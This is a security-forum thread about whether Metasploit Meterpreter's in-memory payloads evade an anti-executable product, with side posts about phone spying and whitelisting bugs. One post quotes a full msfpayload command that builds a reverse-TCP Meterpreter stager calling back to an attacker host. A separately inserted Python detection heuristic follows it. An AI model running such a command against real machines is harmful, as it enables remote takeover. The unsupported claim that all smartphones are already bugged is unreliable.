Can you tell a bit more about this, isn't this in fact comparable with in-memory malware? The payload (meterpreter) works from inside the exploited process, and that's why anti-exe can't block it, am I correct?
Do you guys maybe want to start a new thread and have a general discussion about this? I do think it is an important topic to discuss, but I think if we start a new thread, other developers will be more comfortable in joining the conversation and offering their valuable insights? Just a thought!
Curious, is there an 'envisioned' time table for when Release version 3 will be available through GUI upgrade from v. 2.75 (i.e. weeks, months, a year)?
Vlad will be able to give you a better idea than I can when he returns from vacation, but I imagine a month or so. Thank you!
There is already a thread over here: https://www.wilderssecurity.com/thre...r-edetection-any-antimalware-software.379698/
This is not unusual behavior for any AV. The log is not showing the complete details. Right now, there is a problem with VS not recording complete command lines (e.g. VS does not log all blocked command lines, there is no real-time list of command lines). There is a problem with VS not alerting the user about block actions in some instances. There is no way to look up blocks and white-list them if legitimate (e.g. select a command line block from a real-time list, add it to the white list). Big usability problem...
No. Someone needs to provide a verifiable sample or PoC... because until someone can prove a bypass with an actual sample - that is verified by others via testing - it is nothing but speculation. Another discussion is going to only degenerate into another messy debate and verbal melee \ flame war...
Completely agree with that...and as you say best we avoid going any further with discussions along those lines.
Basically yes, except Metasploit Meterpreter does not need any actual malware. Hence there is no file being executed and nothing for an anti-executable to detect. With that said, I agree with Dan that if more debate about this is needed, it should be done in a new thread. Please point me to it if you decide to create one. For those still asking for "proof", I'll copy-paste my previous reply #8052: "To those wanting some sort of "proof" I will point out that this method is nothing fancy. It's out there for all to see. It's basically just how a Metasploit interpreter works. Metasploit is built into Kali Linux, which is completely free, so anyone who knows how to use Metasploit should be able to reproduce it. Not that I see why it would be needed. After all, when there is no executable, how is an anti-executable supposed to block the attack?"
Great article here on explaining how Meterpreter works: https://www.sans.org/reading-room/whitepapers/forensics/analysis-meterpreter-post-exploitation-35537

-EDIT- The key to stopping this is by detecting the stager. After that it's game over since everything thereafter is done in memory.

"Analysis began with the stager, which was created by the msfpayload utility shown below. This command will embed a Metasploit payload into several formats including code such as C and JS as well as executables and DLLs. The stager executable is small, just over 70K, regardless of the transport method selected.

root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.36.128 LPORT=9002 X > ./payloads/meterpreter_reverse_tcp.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 287
Options: {"LHOST"=>"192.168.36.128", "LPORT"=>"9002"}"
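As an added illustration of the "detect the stager" point above (example code written for this discussion, not from the SANS paper, the thread, or Metasploit itself): a plain reverse_tcp stager connects back to LHOST:LPORT and the handler answers with a 4-byte little-endian length followed by the stage, which for a Windows Meterpreter session is a reflective DLL that begins with the "MZ" marker. The heuristic below flags server-to-client data with that shape on a fresh connection. It assumes an unencoded stage, the size bounds are assumptions, and the flow records are constructed; the 192.168.36.128:9002 pair is reused from the msfpayload output quoted above.

```python
import struct

# Heuristic for the unencoded Metasploit reverse_tcp staging handshake (assumption):
# after the stager connects back, the handler sends a 4-byte little-endian length
# and then the stage itself, a reflective DLL image starting with "MZ".
# A benign server almost never answers a brand-new connection that way.

MIN_STAGE = 64 * 1024        # assumed lower bound: a metsrv stage is well above 64 KiB
MAX_STAGE = 8 * 1024 * 1024  # sanity bound so random length fields are not flagged


def stager_handshake_verdict(server_to_client: bytes) -> dict:
    """Judge the first bytes a client receives from a server after connecting."""
    if len(server_to_client) < 6:
        return {"suspicious": False, "reason": "too short"}
    (declared_len,) = struct.unpack("<I", server_to_client[:4])
    if not (MIN_STAGE <= declared_len <= MAX_STAGE):
        return {"suspicious": False, "reason": "no plausible length prefix"}
    if server_to_client[4:6] != b"MZ":
        return {"suspicious": False, "reason": "length prefix but no PE marker"}
    return {"suspicious": True,
            "reason": "length-prefixed PE image sent to a fresh connection",
            "declared_len": declared_len}


def scan_flows(flows) -> list:
    """flows: dicts with src, dst, dport and the first server_to_client bytes."""
    alerts = []
    for f in flows:
        verdict = stager_handshake_verdict(f["server_to_client"])
        if verdict["suspicious"]:
            alerts.append("%s -> %s:%d %s (%d bytes declared)" % (
                f["src"], f["dst"], f["dport"], verdict["reason"], verdict["declared_len"]))
    return alerts


def _fake_stage_prefix(size: int) -> bytes:
    # Constructed stand-in for the first bytes of a staged DLL: length, MZ marker, filler.
    return struct.pack("<I", size) + b"MZ" + b"\x90" * 58


# Constructed sample flows (first 64 bytes of each server response), not real captures.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "dst": "192.168.36.128", "dport": 9002,
     "server_to_client": _fake_stage_prefix(180000)},
    {"src": "10.0.0.5", "dst": "10.0.0.80", "dport": 80,
     "server_to_client": b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>"},
    {"src": "10.0.0.5", "dst": "10.0.0.81", "dport": 443,
     # TLS ServerHello record header: the first four bytes parse as a plausible
     # length, but no MZ follows, so it must not be flagged.
     "server_to_client": b"\x16\x03\x03\x00\x5a\x02\x00\x00V\x03\x03" + b"\x00" * 32},
]

if __name__ == "__main__":
    for line in scan_flows(SAMPLE_FLOWS):
        print("ALERT", line)
```

This is a heuristic rather than a signature: Metasploit can encode or encrypt the stage, in which case the MZ marker is not on the wire and the check has to fall back to the length-prefix shape plus destination reputation. The size bounds deliberately keep a TLS record header, whose first four bytes happen to parse as a "plausible" length, from producing a false positive.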
Wow... this is crazy. I actually have a client whose cell phone was infected. https://www.youtube.com/watch?v=1u9xswfXwXU&feature=youtu.be
Not surprising. Anyone using a smart phone is already infected by stuff that allows all the snoops to turn on the microphone when the phone is off, and listen to what is being said. Only solution is to go back to the days when a cellphone was just a phone, and not "smart". Not likely to happen.
I still use my 12 year old pay-as-you-go Verizon cell phone. All I have to do is pay at least $5 a month and I keep all my rollover minutes. Actually, it still has the original battery in the thing. It has excellent reception all over the U.S.
Sorry about that... Vlad will be back tomorrow and he will most likely focus on the command lines. Do you guys remember how I had a difficult time getting the command lines just right? And actually, I never did get them just right in VS 2.86. So the command lines are kind of in a transition while he reworks the code, so it may take a week or two to work everything out and get them working perfectly.
Yeah, it will be a very interesting discussion, hopefully with a healthy dose of PoC's. I really would like to see what other developers and exploit experts think as well.
Yeah, it is essentially the same thing as the cmd issue that I could never get exactly right, but he will fix it, I promise.
Nope. You can turn it off and the spooks can turn on the microphone and listen. No POC's on this stuff. It's the "BIG" boys.
I am talking about executable malware, like the example in the video that I posted... in the video, she says "One thing to remember is that these infections got on these iPhones by users clicking on a link to download an app to their iPhone, not from users downloading things from the App Store." In iOS, apps must be approved for the camera and mic to have access. Whether this can be exploited or not, who knows? If turning the lock off is a concern, then you either add an additional deny-by-default prompt, or just hide the desktop shield gadget altogether (for novices). Either way, I believe that the device should be locked when a web app is running, and unlocked when all of the web apps are closed, so that the device is usable. Keep in mind, the lock can include other locking mechanisms other than whitelisting... like anti-exploit, etc., but the core locking mechanism should be whitelisting in my opinion. Also, keep in mind, currently iOS 8 and below essentially blocks any apps that are not provided by the App Store, which is not unlike blocking by digital signature... which is exactly why VS does not allow by digital signature, unless the initial parent process is allowed. According to the video, it sounds like Apple added additional protections in iOS 9, so for now this issue is fixed... so I would be curious what these protections are, and how effective they are compared to whitelisting and auto-building the whitelist with toggling / snapshots.
I am on 3.02 beta.. whitelisted and took a snapshot.. but whenever I right click to open the folder in Internet Download Manager for a downloaded item.. I get this.. I have allowed it n times. http://nium.co/images/f429afaebc.png Should I whitelist rundll in settings?